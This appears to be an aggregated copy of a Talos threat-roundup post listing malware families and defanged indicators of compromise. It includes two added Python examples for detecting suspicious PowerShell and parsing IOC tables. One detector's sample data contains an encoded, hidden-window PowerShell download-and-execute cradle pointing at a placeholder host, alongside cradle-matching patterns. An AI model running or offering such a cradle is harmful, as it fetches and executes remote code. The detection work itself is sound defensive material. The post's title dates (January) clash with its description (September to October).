\\- (158) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (90) \nInstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that displays advertising in the form of pop-ups or by injecting into browsers and adding or altering advertisements on web pages. 
Adware is known to sometimes download and install malware. \nDealply adware detected \\- (88) \nDealPly is adware that claims to improve the user's online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements into web pages. Adware has also been known to download and install malware. \nExcessively long PowerShell command detected \\- (87) \nA PowerShell command with a very long command-line argument, which may indicate an obfuscated or Base64-encoded script, has been detected. PowerShell is an extensible Windows scripting language present by default on all supported versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats. \nCorebot malware detected \\- (23) \nCorebot is a Trojan with many capabilities found in other prominent families. It features a plugin system that lets it load a variety of features from the C2 server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as intercepting and modifying browser communications to steal data, especially data related to banking. \nReverse http payload detected \\- (19) \nAn exploit payload intended to connect back to an attacker-controlled host over HTTP has been detected. \nFusion adware detected \\- (11) \nFusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of pop-ups or by injecting into browsers and altering advertisements on web pages. Adware is known to sometimes download and install malware. 
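The "excessively long PowerShell command" and encoded-command behaviours listed above are straightforward to check for in your own process-creation telemetry (Sysmon event 1, EDR, or Security event 4688 with command-line logging). The following Python is an added example written for this page, not Talos code and not an AMP signature. The sample events, the 1000-character length threshold and the download-cradle keyword list are constructed assumptions to be tuned against your own fleet's baseline.

```python
"""Flag suspicious PowerShell launches in process-creation telemetry.

Added example for this page; not code from the Talos post or from AMP.
SAMPLE_EVENTS is constructed for illustration and is not real telemetry.
"""
import base64
import re

# powershell.exe accepts any prefix of -EncodedCommand ("-e", "-en", "-enc", ...)
# and the documented alias "-ec"; -ExecutionPolicy is deliberately not matched.
ENC_FLAGS = {"encodedcommand"[:n] for n in range(1, len("encodedcommand") + 1)} | {"ec"}
LONG_CMDLINE = 1000  # assumption: characters; tune to your fleet's baseline
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|frombase64string"
    r"|\biex\b|invoke-expression", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
PS_IMAGES = ("powershell.exe", "pwsh.exe", "powershell_ise.exe")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if the flag is absent.

    The payload is Base64 of UTF-16LE text. A blob that fails to decode is
    still reported, because a malformed encoded command is itself worth a look.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] in "-/" and tok[1:].lower() in ENC_FLAGS:
            blob = tokens[i + 1].strip("'\"")
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return "<undecodable payload %s...>" % blob[:16]
    return None


def classify_event(event):
    """Return the reasons a process-creation event looks suspicious ([] if none)."""
    if not event["image"].lower().endswith(PS_IMAGES):
        return []
    reasons = []
    cmd = event["cmdline"]
    if len(cmd) > LONG_CMDLINE:
        reasons.append("excessively long command line (%d chars)" % len(cmd))
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command: " + decoded[:60])
        cmd += " " + decoded  # run the keyword checks over the decoded script too
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden window")
    if CRADLE_RE.search(cmd):
        reasons.append("download/eval cradle")
    return reasons


def scan(events):
    """Return (event, reasons) pairs for every event that trips at least one check."""
    hits = []
    for event in events:
        reasons = classify_event(event)
        if reasons:
            hits.append((event, reasons))
    return hits


# Constructed sample telemetry (assumption): one benign launch, one encoded
# download cradle, one absurdly long inline script, and a non-PowerShell process.
SAMPLE_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s.ps1')"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"image": PS, "cmdline": "powershell.exe -NoProfile -Command Get-Service WinRM"},
    {"image": PS, "cmdline": "powershell.exe -nop -w hidden -enc "
                             + base64.b64encode(SAMPLE_CRADLE.encode("utf-16le")).decode("ascii")},
    {"image": PS, "cmdline": "powershell.exe -c " + "$a=1;" * 300},
    {"image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for event, reasons in scan(SAMPLE_EVENTS):
        print(event["cmdline"][:50], "->", "; ".join(reasons))
```

Decoding the `-EncodedCommand` blob before applying keyword checks matters: the cradle keywords never appear in the raw command line of the second sample event, only in the UTF-16LE script it carries.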
\n \n\nID TALOSBLOG:D44D4A467C76DBF910B545640D073425 Type talosblog Title Threat Roundup for January 3 to January 10 Published 2020-01-10T13:41:18 Modified 2020-01-10T13:41:18 CVSS 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C) Source http://feedproxy.google.com/~r/feedburner/Talos/~3/3Oy-ebGe3yQ/threat-roundup-0103-0110.html\n\n* * *\n\nBulletin family blog Last seen 2019-10-04T17:31:33 CVE list CVE-2019-0708\nDescription\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 27 and Oct. 4. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, it summarizes the threats we've observed by highlighting key behavioral characteristics and indicators of compromise, and discusses how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5d9760d0b0164.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. 
As always, please remember that all IOCs contained in this document are indicators, and a single IOC does not indicate maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nWin.Malware.Zusy-7191579-1 | Malware | Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as \"explorer.exe\" and \"winver.exe.\" When the user accesses a banking website, it displays a form to trick the user into submitting personal information. \nWin.Malware.Osiris-7191711-1 | Malware | Osiris is a banking trojan derived from the Kronos banking trojan and is known to include features such as the ability to communicate with its command and control (C2) servers via Tor and the ability to intercept credentials typed into web forms. \nWin.Dropper.Cerber-7192026-0 | Dropper | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension \".cerber,\" although in more recent campaigns, this is no longer the case. \nWin.Virus.Expiro-7192043-0 | Virus | Expiro is a known file infector and information stealer that hinders analysis with anti-debugging and anti-analysis tricks. \nWin.Malware.Neurevt-7192122-0 | Malware | Neurevt, also known as BetaBot, is a remote access trojan that employs multiple anti-debug and anti-analysis techniques to attempt to avoid detection. \nDoc.Dropper.Emotet-7181950-0 | Dropper | Emotet began as a banking trojan and has remained relevant, increasingly as a loader for other malware, due to its continual evolution to better avoid detection. It is commonly spread via malicious emails carrying macro-laden documents. It recently resurfaced after going quiet over the summer of 2019. 
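The per-threat IOC tables that follow are defanged with `[.]`, wrap registry keys onto a second "Value Name:" line, mix single IPs with CIDR ranges (the Cerber section lists `31[.]184[.]234[.]0/25`), and, as their headers warn, include domains that are merely contacted rather than malicious. The following Python is an added example for this page, not Talos code: it parses tables in the layout used here into typed, refanged hunt lists and builds a matcher that honours the CIDR entries. SAMPLE_TABLES is a hand-assembled excerpt using values from the Zusy and Cerber sections below, and the BENIGN_SERVICES allowlist (ipinfo[.]io, a geolocation lookup service) is this example's own assumption, not Talos guidance.

```python
"""Turn a Talos Threat Roundup IOC table into refanged, typed hunt lists.

Added example for this page, not code from the Talos post. SAMPLE_TABLES is
a hand-assembled excerpt in the roundup's own table layout; BENIGN_SERVICES
is this example's assumption, reflecting the post's caveat that a contacted
domain does not by itself indicate maliciousness.
"""
import ipaddress
import re
from collections import namedtuple

IOC = namedtuple("IOC", "kind value occurrences")

# Constructed excerpt (values taken from the Zusy and Cerber tables on this page).
SAMPLE_TABLES = """\
Registry Keys | Occurrences
---|---
`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN
Value Name: EEFEB657 ` | 82
Mutexes | Occurrences
---|---
`EEFEB657` | 87
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`216[.]218[.]185[.]162` | 54
`31[.]184[.]234[.]0/25` | 25
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`brureservtestot[.]cc` | 57
`ipinfo[.]io` | 25
Files and or directories created | Occurrences
---|---
`%APPDATA%\\EEFEB657\\bin.exe` | 82

#### File Hashes

` 027ecc7f1e2d38d420486e9e0fe9d50bdceb8b50512258a922e69f55e0c18ec7 0a72c56814a288218c9346115935828be03e870fa858a721f738af4dab311205 `
"""

HEADER_RE = re.compile(r"^(.+?)\s*\|\s*Occurrences\s*$", re.M)
ROW_RE = re.compile(r"`([^`]+)`\s*\|\s*(\d+)")          # [^`] also spans newlines
HASHES_RE = re.compile(r"#### File Hashes\s*`([0-9a-fA-F\s]+)`")
KIND_BY_PREFIX = (("Registry", "registry"), ("Mutex", "mutex"), ("IP", "ip"),
                  ("Domain", "domain"), ("File", "file"))
BENIGN_SERVICES = {"ipinfo.io"}  # assumption: lookup service, not attacker infrastructure


def refang(value):
    """Undo the defanging the post applies so the value can be fed to tooling."""
    return (value.replace("[.]", ".").replace("[:]", ":")
                 .replace("hxxps://", "https://").replace("hxxp://", "http://"))


def parse_ioc_tables(text):
    """Return a list of IOC tuples from a roundup's per-threat IOC tables."""
    iocs = []
    headers = list(HEADER_RE.finditer(text))
    for i, header in enumerate(headers):
        end = headers[i + 1].start() if i + 1 < len(headers) else len(text)
        body = text[header.end():end].split("#### File Hashes", 1)[0]
        kind = next((k for p, k in KIND_BY_PREFIX if header.group(1).startswith(p)), "other")
        for row in ROW_RE.finditer(body):
            # Registry rows wrap onto a "Value Name:" line; collapse the whitespace.
            iocs.append(IOC(kind, " ".join(row.group(1).split()), int(row.group(2))))
    hashes = HASHES_RE.search(text)
    if hashes:
        # The hash block carries no occurrence count in the post.
        iocs.extend(IOC("sha256", h.lower(), None) for h in hashes.group(1).split())
    return iocs


def hunt_list(iocs, benign=BENIGN_SERVICES):
    """Group refanged indicator values by kind, dropping benign service domains."""
    grouped = {}
    for ioc in iocs:
        value = refang(ioc.value)
        if ioc.kind == "domain" and value.lower() in benign:
            continue
        grouped.setdefault(ioc.kind, []).append(value)
    return grouped


def network_matcher(iocs):
    """Build a predicate testing whether an IP falls inside any listed IP or CIDR entry."""
    nets = [ipaddress.ip_network(refang(i.value), strict=False)
            for i in iocs if i.kind == "ip"]
    return lambda ip: any(ipaddress.ip_address(ip) in net for net in nets)


if __name__ == "__main__":
    parsed = parse_ioc_tables(SAMPLE_TABLES)
    for kind, values in hunt_list(parsed).items():
        print(kind, values)
    print("31.184.234.100 in listed ranges:", network_matcher(parsed)("31.184.234.100"))
```

Treating every IP entry as a network (`strict=False` turns a bare address into a /32) lets a single predicate cover both the Zusy-style single addresses and the Cerber /25, and keeping the allowlist explicit makes the "does not indicate maliciousness" judgement a reviewable decision rather than a silent omission.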
\n \n* * *\n\n## Threat Breakdown\n\n### Win.Malware.Zusy-7191579-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: EEFEB657 ` | 82 \nMutexes | Occurrences \n---|--- \n`EEFEB657` | 87 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`216[.]218[.]185[.]162` | 54 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`brureservtestot[.]cc` | 57 \nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\AppData\\LocalLow\\EEFEB657` | 84 \n`%APPDATA%\\EEFEB657` | 82 \n`%APPDATA%\\EEFEB657\\bin.exe` | 82 \n \n#### File Hashes\n\n` 027ecc7f1e2d38d420486e9e0fe9d50bdceb8b50512258a922e69f55e0c18ec7 0a72c56814a288218c9346115935828be03e870fa858a721f738af4dab311205 0a9fd449b13193c771c2d401dd6538cab6dbb2c37e0573b05cc72802b90687cf 0b1fa36c3ae5bdb7c52c40e08566cceac37965265e5b2552fdf121add431ce45 0ce401aa748f86238016408aa5c7b082a83499a2cbf2d5a1370b3bef8b983be1 1266c2bccc5fa61af8b611d3c7f210b11fed7d22dbb24305bf6003b1891399fe 12ef657ff31b48b90fbb20b212643f7aa62b66dae80cd19feed7356089f18451 149e17e85475bf4f6b4be6c0f1924e8554ec982f949fcb833c8c6bc3a7673669 1a0d6dda8e405f9342fadc87a1a6b395250bfcf910f5e2e4cfba806de2b58eee 1b3ddf7b2a71290a0a86e974a323dde16999e7eaa2be2b8cd63c066a7ba6a052 1fa747673986b53ed65fa0a6b39a024ef02191966184a6fd8844e742fdbc3d58 22b172ead1618e0c49a6d94c4da6c7ba1d401549276bc3a7f3d78c18909e6793 2b9b82e7ee0d8661b2268f83a010e8379e28930cc7f9f224d06fcd37b48f566d 2ba984bf6a2e039225b78faf309d087db56a6a2eac5efc73f5f20ff941c58442 2c33aa852da4527f49dae1e6bb1940b4c7cd2c814da0a90ab8a2a5de5fee6726 2c594bcf891b90e24c8bd445d5ddbe9cb50f5d101d559d564ab8246535d2af53 306774877254b8ca51a2bf446834cc34126ac56ebaf9d935442c25e533485fc1 38efe6d2c2e264e83d54cebc4bb14766c344741e39b510b027882d1ef2bbb798 43aee0e0761a3e90aa35d3401634397be8d1691d88ed2bdaaf2f60c915de53e2 
467e66e8fc95c740cc3beee432d6a5e85bc533aa6dd609865376dacf0a0ef6e7 47bc6db08ad7826b5a68644d6f013405e4e6842525b8a4d05a2abdabfd735fc4 484f52c4598eddc67147f8558c9bf9701d1c4d2f5bcc1b619a43422863d1e8ce 48624a37bd7f3faacc3d56c106a40189c413dc4ec4407c00a1034578cfb6a9b3 4a3a67a893cf7e49a5aef587d840867589841e93ae7f418019d6f94daba58c47 4bd1deaa13a4a9cef75f84dba895645a24ac7f4b4bd69d22ea5800a3c682cc54 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-4u15Rz65tAA/XZddgxYFSlI/AAAAAAAACt0/c4t_kH8jhUEQEz011XGkTQNN5jhgH0sWgCLcBGAsYHQ/s1600/484f52c4598eddc67147f8558c9bf9701d1c4d2f5bcc1b619a43422863d1e8ce_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-i65rPHuheuE/XZddvf8boEI/AAAAAAAACt4/qqj9VP2GX9QS_ysbtho1KxieEbpffk_iwCLcBGAsYHQ/s1600/74e955ce1d18be739ac0292e506146820140ba5e40cc15cfc142fdb40553174b_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-ahFkjjuMKQk/XZdd0sofcnI/AAAAAAAACuA/Eqquits2mwonPN2PUSGRy9wVIAabFQp1ACLcBGAsYHQ/s1600/2b32ffb0a0bcb61882ac3907d11afd5428054ac7e9ee4aa6dabca24277e51dee_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Osiris-7191711-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: HideFileExt ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION \nValue Name: d41d8cd9 ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION \nValue Name: d41d8cd9 ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: d41d8cd9 ` | 11 
\n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: d41d8cd9 ` | 11 \nMutexes | Occurrences \n---|--- \n`Global\\d41d8cd98f00b204e9800998ecf8427e` | 11 \n`Global\\{B1F6EFF9-6297-200E-B1F6-F9EF29AA7A00}` | 11 \n`Global\\{BF6093C4-5FBA-D878-BF60-C4933C20A000}` | 9 \n`Global\\dd4b21e9ef71e1291183a46b913ae6f2` | 9 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`updateserver4[.]top` | 11 \n`updateserver7[.]top` | 11 \n`updateserver5[.]top` | 11 \n`updateserver9[.]top` | 11 \n`updateserver2[.]top` | 11 \n`updateserver8[.]top` | 11 \n`updateserver10[.]top` | 11 \n`updateserver6[.]top` | 11 \n`updateserver3[.]top` | 11 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Mozilla\\Firefox\\Profiles\\<profile ID>.default\\user.js` | 11 \n`%System32%\\CatRoot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb` | 9 \n`%APPDATA%\\Microsoft\\{56984C2C-8905-4BFA-8553-0BE17726FCD5}` | 4 \n`%APPDATA%\\Microsoft\\{56984C2C-8905-4BFA-8553-0BE17726FCD5}\\d41d8cd9.exe` | 4 \n`%APPDATA%\\Microsoft\\{56984C2C-8905-4BE2-8553-13E17726E4D5}` | 2 \n`%APPDATA%\\Microsoft\\{56984C2C-8905-4BE2-8553-13E17726E4D5}\\d41d8cd9.exe` | 2 \n`%APPDATA%\\Microsoft\\{9A96A2D0-FE36-485E-B81C-0132628C474C}\\dd4b21e9.exe` | 1 \n`%APPDATA%\\Microsoft\\{03FFB58D-7238-49DA-9378-5224CBD1F546}\\dd4b21e9.exe` | 1 \n`%APPDATA%\\Microsoft\\{575A5E0A-FD63-4DF1-BF50-033349A4ADA1}\\dd4b21e9.exe` | 1 \n`%APPDATA%\\Microsoft\\{33C67668-6248-47D0-8FDF-197713CA89A1}\\dd4b21e9.exe` | 1 \n`%APPDATA%\\Microsoft\\{FA144B4E-77DF-4C1F-A472-60E20FF489C2}\\dd4b21e9.exe` | 1 \n`%APPDATA%\\Microsoft\\{507C47B0-1E13-4926-92BC-C40E8A4CB040}\\dd4b21e9.exe` | 1 \n`%APPDATA%\\Microsoft\\{F807BD90-CAC5-40B0-828A-CA06ED52C5F4}\\dd4b21e9.exe` | 1 \n`%APPDATA%\\Microsoft\\{780EBCFD-EADA-4438-9DC3-324538311844}\\dd4b21e9.exe` | 1 \n \n#### File Hashes\n\n` 05ba5705db7ff502d4422ea7d4ef32422d9b2c0966a42b6b3d76c126d51e846d 
0aae22c6557c43cf199421eb6b367d23469909b5f860468c1e42b0e5730808d5 2c5fdc198324cc33dc93d20dc58195608661ed5c83cf10619efdbc1fddeb51e5 4c6f284b0be38d51af26ee87e687cbba32184e0b21203758419953e1f476e841 4f645f4ae3dcf8bfebf4dde1b6d20497ce25fbbc1f6f691d40a95d7bff7a2d6c 5ba866dbb2ace005cfa32382404ac0927695f52bedce0804564549e633be8318 6478b2ce18a6a7671a39aa254ba0c4aaf123a0f5b27e9c86e323b663332f18f8 6f2add6401f59d813de66bc1152240f2e7622e293a0b10c5a804790b7068195b 6f9d45cf7571949de6db54d2e4c642ae63e30ba0eaf4f3075b8cd36749171377 919d3b68ee264053ae4f0f3d9caf93c055c421dabdc419d5d52d09d089142498 f7ce779ae0308c0c0da8280d3182506eda97778e91969eb4ea86dc3bfddb12df `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-RPO_aJyoeEU/XZdeH2iYLUI/AAAAAAAACuI/SCBwjGCIJyIMAR-wF6oeU4AIzvdRArjxwCLcBGAsYHQ/s1600/0aae22c6557c43cf199421eb6b367d23469909b5f860468c1e42b0e5730808d5_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-IIykQjPA0AM/XZdeLyj6vqI/AAAAAAAACuM/nVaobZBr2Ogna6OVzJQdW2pTI3IiybJZQCLcBGAsYHQ/s1600/0aae22c6557c43cf199421eb6b367d23469909b5f860468c1e42b0e5730808d5_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-gHb7-YxUIJc/XZdeQanDu9I/AAAAAAAACuQ/HMU0hlzxH4opqS3WS8lyDkCvCtTRNw2VwCLcBGAsYHQ/s1600/919d3b68ee264053ae4f0f3d9caf93c055c421dabdc419d5d52d09d089142498_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Cerber-7192026-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: Run ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\COMMAND PROCESSOR \nValue Name: AutoRun ` | 25 \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: SCRNSAVE.EXE ` | 25 
\n`<HKCU>\\PRINTERS\\DEFAULTS\\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D} ` | 25 \n`<HKCU>\\PRINTERS\\DEFAULTS ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Magnify ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: Magnify ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: wusa ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: wusa ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: LocationNotifications ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: FlashPlayerApp ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: FlashPlayerApp ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: DWWIN ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: DWWIN ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: mshta ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: mshta ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: autoconv ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: autoconv ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: RMActivate_isv ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: RMActivate_isv ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: eventcreate ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: eventcreate ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: w32tm ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: w32tm ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: netbtugc ` | 1 \nMutexes | Occurrences 
\n---|--- \n`shell.{381828AA-8B28-3374-1B67-35680555C5EF}` | 25 \n`shell.{785F99DE-E95E-3921-EE78-D7777849AA01}` | 1 \n`shell.{967822DD-7042-E624-BEA7-C7EF520E90F5}` | 1 \n`shell.{A92873EC-3840-982A-DA5D-DDDC12AA8495}` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`31[.]184[.]234[.]0/25` | 25 \n`216[.]239[.]34[.]21` | 8 \n`216[.]239[.]32[.]21` | 7 \n`216[.]239[.]36[.]21` | 5 \n`216[.]239[.]38[.]21` | 5 \n`54[.]88[.]175[.]149` | 3 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ipinfo[.]io` | 25 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}` | 25 \n`%TEMP%\\# DECRYPT MY FILES #.html` | 3 \n`%TEMP%\\# DECRYPT MY FILES #.txt` | 3 \n`%TEMP%\\# DECRYPT MY FILES #.url` | 3 \n`%TEMP%\\# DECRYPT MY FILES #.vbs` | 3 \n`%HOMEPATH%\\# DECRYPT MY FILES #.html` | 2 \n`%HOMEPATH%\\# DECRYPT MY FILES #.txt` | 2 \n`%HOMEPATH%\\# DECRYPT MY FILES #.url` | 2 \n`%HOMEPATH%\\# DECRYPT MY FILES #.vbs` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\Magnify.lnk` | 2 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\Magnify.exe` | 2 \n`%System32%\\Tasks\\Magnify` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\wusa.lnk` | 2 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\wusa.exe` | 2 \n`%System32%\\Tasks\\wusa` | 2 \n`%System32%\\Tasks\\mtstocom` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\odbcconf.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\odbcconf.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\netbtugc.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\netbtugc.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\expand.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\expand.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start 
Menu\\Programs\\StartUp\\AdapterTroubleshooter.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\AdapterTroubleshooter.exe` | 1 \n`%System32%\\Tasks\\autoconv` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 151143935c4283f66a837eca1761400ab0573929e04217a5be0286b28eeb9d15 1736c692db984e5ceb7e15a127f2478400a78c30785fd3c195ae4d9468b80259 185f85a2fbc3e27f87b099ff50a1f03f89e724e7927ec9edac4c4416dc87c109 1da732e9670f73e980723ea167abb29c5b553603c3804ec4bb9a03a4d506e8a4 3a6ca5a46ac5ac3ef7972b22e2fa5cdc4af2e137150691ed1b7a15b1ce9030a4 3c7e1a50d31138b53165e98d7bc2ba570304359bb4f7baab7ded17cc3fb3bc4c 4574e5aeda39aadfadb399654d2a6db00884be85b0882fb0acc4dbf14153ca0e 4e242ff308fc31ada637861fed73373c30eb2d5ecfda92760498fcbe30a9bb07 503baff89f763142c5b49a527972c7119be3f95fcc8cc2a1cde8bb71fd76cd02 561caadf62f59ee8dfd6d9c97e5692875458c55b3e2d53ba43e9496c40ee0824 5dbfa76bd1edb0ae7a516a08c760e2234506d64ae7c905f8e0e8830d74ef8613 65afc018d8cdcc9ec4756e98000265e3ecc3e394b7e5d493dfd6d106cc15118a 6971a5b1aa7e57abad2939f4be1a92651ea7ac12251b804ae17f2ecb1e1bf200 70b5c51e692dcd2f432c05170f7f823fdfd5b6857267117a92fe9d358a7026ed 84a45eec021015ee2eeb5acb7251f3c50c626b41bf47b8fce7c822253e175c64 999a1e5659ac864771ad420c7cad50de5b5118adb5abb80ffe18ad28c932f5a0 a51de392aae3ade74991dd86b1d205c2cc5ecb0752cac2a02c95d61ff14a558c a80ace30082b76edb75d6c9a4f9165af721a8f8b13ac0862bc438589e0af01bd 